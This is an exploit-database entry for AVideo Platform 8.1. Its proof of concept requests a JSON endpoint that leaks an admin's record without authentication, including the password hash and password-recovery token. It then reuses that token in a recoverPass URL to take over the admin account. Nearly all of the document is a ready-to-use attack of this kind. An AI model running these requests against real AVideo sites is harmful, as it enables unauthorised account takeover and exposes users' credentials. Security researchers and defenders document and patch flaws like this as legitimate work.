Share
# Exploit Title: AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)  
# Dork: N/A  
# Date: 2020-02-05  
# Exploit Author: Ihsan Sencan  
# Vendor Homepage: https://avideo.com  
# Software Link: https://github.com/WWBN/AVideo  
# Version: 8.1  
# Tested on: Linux  
# CVE: N/A  
  
# POC:   
# 1)  
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]  
#   
................  
0   
id 92  
user "admin"  
name "Watch Later"  
email "user@localhost"  
password "bc79a173cc20f0897db1c5b004588db9"  
created "2019-05-16 21:42:42"  
modified "2019-05-16 21:42:42"  
isAdmin 1  
status "watch_later"  
photoURL "videos/userPhoto/photo1.png"  
lastLogin "2020-02-03 08:11:08"  
recoverPass "0ce70c7b006c78552fee993adeaafadf"  
................  
#  
# Password recovery can be done using recoverPass.  
# http://localhost/[PATH]/recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf  
#